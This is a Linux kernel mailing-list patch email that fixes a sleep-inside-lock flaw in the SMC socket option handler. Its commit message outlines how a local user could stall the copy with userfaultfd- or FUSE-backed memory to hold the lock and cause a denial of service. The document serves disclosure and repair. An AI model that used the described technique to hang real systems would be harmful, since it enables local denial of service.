From nobody Sat Jun 13 06:24:06 2026 Received: from mail-yw1-f171.google.com (mail-yw1-f171.google.com [209.85.128.171]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by smtp.subspace.kernel.org (Postfix) with ESMTPS id 5D5EE312832 for ; Sat, 9 May 2026 11:01:15 +0000 (UTC) Authentication-Results: smtp.subspace.kernel.org; arc=pass smtp.client-ip=209.85.128.171 ARC-Seal: i=2; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116; t=1778324476; cv=pass; b=Q+TboNh5muK4OsO8d+PM49YwuQ9qnykikr+IkgyEb1tx2BPmZ9bOTqw6G1lg2DqWlu0jw6PxaHyaC5z3P2Gr68M31lo6Efk/0OobU5uucf1ezQ1o40NV2CWCxkVBj7tJEesXSeSv/5liH6WoXY3nVZ4sH23utXfd4VK90aU3kD8= ARC-Message-Signature: i=2; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116; t=1778324476; c=relaxed/simple; bh=9zJ/Jp0AIo86B4ZPDMd67viV7ao0qHIhk0miTEb1P1Y=; h=MIME-Version:From:Date:Message-ID:Subject:To:Cc:Content-Type; b=E+Y2mOc1/iyPtGUEmg0uXBZaev63SbADaAXMY4lcAbJTjyVK5xwuim3U5pVtpbb/DVxOQMAX1YpncCH/gtsgcehtSQ6HnX8PZJYrV3Y4oYZAnbLYPKoarWR7WLDe46vaZR/Bq6OSSB+lyEiBK3sKYnAs9DXhw7SvoK7xBw5VxEQ= ARC-Authentication-Results: i=2; smtp.subspace.kernel.org; dmarc=pass (p=none dis=none) header.from=gmail.com; spf=pass smtp.mailfrom=gmail.com; dkim=pass (2048-bit key) header.d=gmail.com header.i=@gmail.com header.b=YAeTUw7R; arc=pass smtp.client-ip=209.85.128.171 Authentication-Results: smtp.subspace.kernel.org; dmarc=pass (p=none dis=none) header.from=gmail.com Authentication-Results: smtp.subspace.kernel.org; spf=pass smtp.mailfrom=gmail.com Authentication-Results: smtp.subspace.kernel.org; dkim=pass (2048-bit key) header.d=gmail.com header.i=@gmail.com header.b="YAeTUw7R" Received: by mail-yw1-f171.google.com with SMTP id 00721157ae682-7c0dea734bcso4480497b3.2 for ; Sat, 09 May 2026 04:01:15 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1778324474; cv=none; d=google.com; s=arc-20240605; b=G63Pjh2pCkrM46+c6YQXdycOcXOuBPmQgIYQp8d9S5W/vlXrWMTxVcjNVDv637Y4uT dFG7yXi3gtpJdcvVnoAgc9W85OjAhZtnI944SJViRcqMdeMWcEcmKCre8Jrra3L157Qm VyHTR8rDRW4OERCA7A1TO7vSn+3mGMo4cdgCI/2r1jTPCzlMUKtZ1ZOYVDAszhpHb3Rn YGOZTQPxuT90eQVk4dXp8jqX9PT92/eSK4jPEK5lJ44afkimTfXOptVfxWb/jBzFhjF7 dW4+wqqfbBg31/Sp3csTJRHwJioiHJlqxmgJ9Uq/8X0Y+Rl5jSOCianB1ZzdmZG/8J7v 3Ksw== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20240605; h=content-transfer-encoding:cc:to:subject:message-id:date:from :mime-version:dkim-signature; bh=iIt0P0A7yVCeb9NAEa3+HLFnhyLLlsPvHqZAy7iz+x8=; fh=L1a2FoMC+PwcEfIikd0r5Gmcok8kYqOQqoyiUoXtjVw=; b=FauPxTQE+LvbLqfwUDPULb1ZOpguyWMBsyo3nPb99/OBClvt7ng/CeoDMlqOE/pV1C iXUtIe75dXwEhYysmqkOwZv9baucxT6vpxw3I9Iy3jrgfbHUH0dkXXK5q45PpSG1iAmU SiczoXMi1k04Dx5VQSpA6H5zliJjVpybHv7TO7Z3H4ayJiW+prMaHwcGE2l22fbTyiJ5 ORt77ZHSH5O0Y8Zk6LcF3UjIMIVQ0VfLJYF9RtuLZFXjNs1QQR1+u5pKtMpdN1Adqu+e UlabDWq0f44YlZPJ2RSqFJ88IepI+PRlIoCTsm2/l/Sr8eqavgGcd9iY+mv/FbPTIW7y g3Iw==; darn=vger.kernel.org ARC-Authentication-Results: i=1; mx.google.com; arc=none DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20251104; t=1778324474; x=1778929274; darn=vger.kernel.org; h=content-transfer-encoding:cc:to:subject:message-id:date:from :mime-version:from:to:cc:subject:date:message-id:reply-to; bh=iIt0P0A7yVCeb9NAEa3+HLFnhyLLlsPvHqZAy7iz+x8=; b=YAeTUw7RdhE+KGH22BJXrVVDLE+iBu3X6MApbDMeMbMfUJF02/AgJ34216Ad9y03mg 3u5h8QCUUPB7Jd9/v2hcH+R/gGBrPzSSkCXXt1n97Z5q4+tHorLGWCAJvEG9NxCdO8we uvI3POV4DDGpHkNM1Fk+LiAiIh5GTc78XpiD0h2Gux1jHC/oIxf0Y8hsRR76aNLKgNfU YSRTIhyRfg/jeROS7kWvfn7kXVHfmbs5yY2POhy/Qd/QW7gq+daGRS2OsMRcJmey8hJE AEImZxhq5gLKFoId6lAQw3XfTJ7M9iMELP1gg7dSPKiRIbzeRQOngIUyxQ/ewtV/PJUv Ah6w== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20251104; t=1778324474; x=1778929274; h=content-transfer-encoding:cc:to:subject:message-id:date:from :mime-version:x-gm-gg:x-gm-message-state:from:to:cc:subject:date :message-id:reply-to; bh=iIt0P0A7yVCeb9NAEa3+HLFnhyLLlsPvHqZAy7iz+x8=; b=l6HSoKTZCbp/BeuZsmIh0HqpQG9lc6IQbnYDIu7QfoPMqVEIpybiaHMlnRplXIgaEX yFOJ9obmKG3qfUYdkC3wFlmaMkAD8l5xhySzq8KeTBZjeZEHBxJFugqBHfTFiVn5Thlv UVoqzaFzt6ZIK1kYx4VXik5k8+8Dp6vd49AYNCGtNIH9vu5D+fq3YjNhA8C4oOaRgPW+ X9QcTfabTK8qnfXBV1uZKO5aJRbGkjFMFgB2QYoqkwwL0oghHa7IrDH8PkinZoyvKvVu JOmTQHLIEo99z9idjtcdsnA7sGwnUd2WA21xyz+AxnHfaTxlADjkt68G/+thoVd2v0Df goyQ== X-Forwarded-Encrypted: i=1; AFNElJ/T+R/oeWvP9bI2LbzWqs1b4M0tmhH5zJJgEHsbu0rOq7qhufcxAg2gGUzJNFww6X24yhD30zpH41JI1GQ=@vger.kernel.org X-Gm-Message-State: AOJu0Yy8zv4oDNLxNcvEyiWGHPgs9Bf4hBZiRjbhceGpvT1C7xvppz/B U9DblgurjQiAsc8zLGLo5tsNxj8xqQfWBhMB/gxsuWIm7MeFlNyt3S8w+50Mq77IINKkk47P3oW fABCj3nNiRrOUJq2LIEO3A/e0uRaYBcU= X-Gm-Gg: Acq92OGNT4Go+uFsUS+rv/PscQiKjY53JQNDK99Gu61SNAyhUoeROs1gGYHLoFYh1ju 7OMV+LhqpwIbsPttLKqC7SYW898PoLoVAWm8i8jITH5754FWlIYzJop35H8dK0ecf6b1FDftTUb KePisufwL8r559vo66MsEji99jzP0cy7f5RlWa4P7j58va8KseeHZrtQC2wXlSXZzziAf9O142G MO4ySeQUWhnYCB9+6yE1hl8SzcWb/kDwEWgNkiLqnw2OyCSkCyz6qiyY0pD7Em6un+szSNprAB7 xj9sn1c= X-Received: by 2002:a05:690c:e3ed:b0:7bd:6a98:58e4 with SMTP id 00721157ae682-7c104bb091emr20425757b3.27.1778324474394; Sat, 09 May 2026 04:01:14 -0700 (PDT) Precedence: bulk X-Mailing-List: linux-kernel@vger.kernel.org List-Id: List-Subscribe: List-Unsubscribe: MIME-Version: 1.0 From: =?UTF-8?Q?Nicol=C3=B2_Coccia?= Date: Sat, 9 May 2026 07:01:02 -0400 X-Gm-Features: AVHnY4JmYlXDKdj4Xp-aA7FtSfefy9b28FYyhJ4KqsK6_4gIiVDKucQbACylHK8 Message-ID: Subject: [PATCH net] net/smc: fix sleep-inside-lock in __smc_setsockopt() causing local DoS To: alibuda@linux.alibaba.com, dust.li@linux.alibaba.com, sidraya@linux.ibm.com, Wenjia Zhang Cc: Tony Lu , Wen Gu , linux-rdma@vger.kernel.org, linux-s390@vger.kernel.org, linux-kernel@vger.kernel.org, netdev@vger.kernel.org, mjambigi@linux.ibm.com, =?UTF-8?Q?Nicol=C3=B2_Coccia?= Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset="utf-8" A logic flaw in __smc_setsockopt() allows a local unprivileged user to cause a Denial of Service (DoS) by holding the socket lock indefinitely. The function __smc_setsockopt() calls copy_from_sockptr() while holding lock_sock(sk). By passing a userfaultfd-monitored memory page (or FUSE-backed memory on systems where unprivileged userfaultfd is disabled) as the optval, an attacker can halt execution during the copy operation, keeping the lock held. Combined with asynchronous tear-down operations like shutdown(), this exhausts the kernel wq (kworkers) and triggers the hung task watchdog. [ 240.123456] INFO: task kworker/u8:2 blocked for more than 120 seconds. [ 240.123489] Call Trace: [ 240.123501] smc_shutdown+... [ 240.123512] lock_sock_nested+... This patch moves the user-space copy outside the lock_sock() critical section to prevent the issue. Fixes: a6a6fe27bab4 ("net/smc: Dynamic control handshake limitation by socket options") Signed-off-by: Nicol=C3=B2 Coccia --- v1 -> v2: - Rebased against netdev/net tree - Added Fixes tag net/smc/af_smc.c | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c index 185dbed7de5d..da28652f6810 100644 --- a/net/smc/af_smc.c +++ b/net/smc/af_smc.c @@ -3054,18 +3054,17 @@ static int __smc_setsockopt(struct socket *sock, int level, int optname, smc =3D smc_sk(sk); + /* pre-fetch user data outside the lock */ + if (optname =3D=3D SMC_LIMIT_HS) { + if (optlen < sizeof(int)) + return -EINVAL; + if (copy_from_sockptr(&val, optval, sizeof(int))) + return -EFAULT; + } + lock_sock(sk); switch (optname) { case SMC_LIMIT_HS: - if (optlen < sizeof(int)) { - rc =3D -EINVAL; - break; - } - if (copy_from_sockptr(&val, optval, sizeof(int))) { - rc =3D -EFAULT; - break; - } - smc->limit_smc_hs =3D !!val; rc =3D 0; break; --=20 2.51.0